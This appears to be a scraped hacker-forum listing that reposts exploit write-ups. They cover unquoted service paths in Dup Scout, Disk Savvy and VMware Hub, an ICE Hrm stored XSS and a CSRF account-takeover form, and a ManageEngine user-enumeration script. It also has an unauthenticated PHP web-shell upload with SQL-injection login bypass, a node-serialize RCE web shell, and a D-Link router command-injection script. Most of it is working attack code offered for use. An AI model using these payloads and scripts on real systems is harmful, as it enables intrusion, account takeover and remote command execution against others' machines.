    # Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.dupscout.com # Software Links: # https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe # https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe # Tested Version: 13.5.28 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Dup Scout Server Dup Scout Server C:\Program Files\Dup Scout Server\bin\dupscts.exe Auto Dup Scout Enterprise Dup Scout Enterprise C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe Auto C:\>sc qc "Dup Scout Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Dup Scout Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout Server\bin\dupscts.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Dup Scout Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\>sc qc "Dup Scout Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Dup Scout Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Dup Scout Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  18. HireHackking

    Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.disksavvy.com # Software Links: # https://www.disksavvy.com/setups_x64/disksavvysrv_setup_v13.6.14_x64.exe # https://www.disksavvy.com/setups_x64/disksavvyent_setup_v13.6.14_x64.exe # Tested Version: 13.6.14 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Savvy Server Disk Savvy Server C:\Program Files\Disk Savvy Server\bin\disksvs.exe Auto Disk Savvy Enterprise Disk Savvy Enterprise C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe Auto C:\>sc qc "Disk Savvy Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Savvy Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy Server\bin\disksvs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Savvy Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\>sc qc "Disk Savvy Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Savvy Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Savvy Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  19. HireHackking

    ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS) # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: https://icehrm.com/ # Version: 29.0.0.OS # Tested on: Windows 10 and Kali #Description The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. #Steps to Reproduce the issue: 1- Login to ICE Hrm Admin Panel 2- Click on Employees=>Document Management=> Upload a below xml file <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS"); </script> </svg> 3- Visit the upload location of file and XSS will get triggered. #Video POC: https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing
  20. HireHackking

    Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration # Date: 17/06/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) # Vendor Homepage: https://www.manageengine.com # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 # Version: Previous to build 10519 # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 import argparse import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack') parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack') parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file') parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file') my_args = parser.parse_args() return my_args def main(): args = get_args() url = args.target domain = args.domain usersfile = args.usersfile outputfile = args.outputfile s = requests.session() s.get(url) resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False) incorrect_size = len(resp_incorrect.content) print("Incorrect size: %s"%(incorrect_size)) correct_users = [] users = open(usersfile).read().splitlines() for u in users: resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) valid = (len(resp.content) != incorrect_size) if valid: correct_users.append(u) print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid))) print("\nCorrect users\n") with open(outputfile, 'w') as f: for user in correct_users: f.write("%s\n" % user) print("- %s"%(user)) print("\nResults stored in %s\n"%(outputfile)) if __name__ == "__main__": main()
  21. HireHackking

    Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 06-16-2021 # Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html # Software Links : https://getwsone.com/ # Tested Version: 20.3.8.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ VMware Hub Health Monitoring Service VMware Hub Health Monitoring Service C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe Auto C:\>sc qc "VMware Hub Health Monitoring Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: VMware Hub Health Monitoring Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : VMware Hub Health Monitoring Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  22. HireHackking

    ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF) # Exploit Author: *Piyush Patil* & Rafal Lykowski # Vendor Homepage: https://icehrm.com/ # Version: 29.0.0.OS # Tested on: Windows 10 and Kali #Description ICE Hrm Version 29.0.0.OS is vulnerable to CSRF which allows attacker to add new admin account or change the password leading to full account takeover. #Steps to reproduce the attack: 1- Login as victim 2- Open the CSRF malicious file which I have attached (csrf_POC.html) <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8070/app/service.php"> <input type="hidden" name="t" value="User" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="admin&#61;users" /> <input type="hidden" name="req" value="&#123;"id"&#58;1&#44;"pwd"&#58;"Hacker123&#35;"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3- Password is changed (you can also add new admin user) Now you can simply takeover the account #Video POC: https://drive.google.com/file/d/1uUciTcFEkQ5P_R37QBswNrVbOPqzngpX/view?usp=sharing
  23. HireHackking

    Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated) # Date: 17.06.2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://phpgurukul.com/shopping-portal-free-download/ # Version: V3.1 # Tested on: Windows & Ubuntu import requests import random import string url = "http://192.168.1.3:80/shopping" payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" session = requests.session() print("logining") request_url = url+"/admin/" post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''} session.post(request_url, data=post_data) let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) randstr = ''.join(random.choice(let) for i in range(15)) print("product name is "+randstr) print("shell name is "+shellname) print("uploading payload") request_url = url+"/admin/insert-product.php" post_header = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJNYN304wDTnp1QmE", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": url+"/admin/insert-product.php", "Accept-Encoding": "gzip, deflate", "Connection": "close"} post_data = "------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n80\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"subcategory\"\r\n\r\n8080\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productCompany\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productpricebd\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productprice\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productDescription\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productShippingcharge\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productAvailability\"\r\n\r\nIn Stock\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage1\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage2\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage3\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE--\r\n" session.post(request_url, headers=post_header, data=post_data) request_url = url+"/search-result.php" post_data = {"product": randstr, "search": ''} shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo=\"admin/productimages")[1].split(shellname+".php")[0] print("\npath of shell= "+url+"/admin/productimages"+shellpath+shellname+".php")
  24. HireHackking

    Node.JS - 'node-serialize' Remote Code Execution (3)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3) # Date: 17.06.2021 # Exploit Author: Beren Kuday GORUN # Vendor Homepage: https://github.com/luin/serialize # Software Link: https://github.com/luin/serialize # Version: 0.0.4 # Tested on: Windows & Ubuntu # CVE : 2017-5941 var serialize = require('node-serialize'); var payload = { "webShell" : "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()" } serialize.unserialize(serialize.serialize(payload)) /* # after being exploited ┌──(root@kali)-[/home/kali] └─# curl http://10.0.2.4:443?cmd=whoami nodeadmin */
  25. HireHackking

    Dlink DSL2750U - 'Reboot' Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection # Date: 17-06-2021 # Exploit Author: Mohammed Hadi (HadiMed) # Vendor Homepage: https://me.dlink.com/consumer # Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16 # Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R* # https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) ### #!/bin/bash # Exploit by HadiMed # Takes advantage of the tftp server that accepts the cfg file blindly echo -ne "\n" echo "Exploiting Dlink DSL-2750u version 1.6" echo -ne "\n\n" # Sending the payload echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1 echo -ne "\n" echo "File uploaded Successfully" echo "Waiting for router to restart" sleep 180 # approximate time for router to restart python3 exploit.py ### import requests # HTTP request looks like this ''' POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.1.1 Content-Length: 175 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.1/cgi-bin/webproc Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91 Connection: close getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 ''' # 1 Getting a session id # password and username crafted by me on the cfg.xml file username = "pwned" password= "pwned" # acually the client set the sessionid in condition that the password and username are correct Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef" Contentty="application/x-www-form-urlencoded" Referer="http://192.168.1.1/cgi-bin/webproc" Contentlen="175" # Sending first request to set our session id response = requests.post("http://192.168.1.1/cgi-bin/webproc", headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } , data={ "getpage":"html/index.html", "errorpage":"html/main.html", "var:menu" : "setup", "var:page":"wizard", "obj-action":"auth", ":username":username, ":password":password, ":action":"login", ":sessionid":"deadbeef" } ) Referer = "http://192.168.1.1/cgi-bin/webupg" name = "mac" cmd = "1;sleep${IFS}10;reboot;" Contentlen = str(len(name+cmd)+10) if response.status_code==302: print("got sessionid=deadbeef !\n waiting for the reverse shell ...") # access cgi-bin/webupg try : response = requests.post("http://192.168.1.1/cgi-bin/webupg", headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001 ) except requests.exceptions.Timeout : print("done router will restart in 20 sec") print("Device restarted!")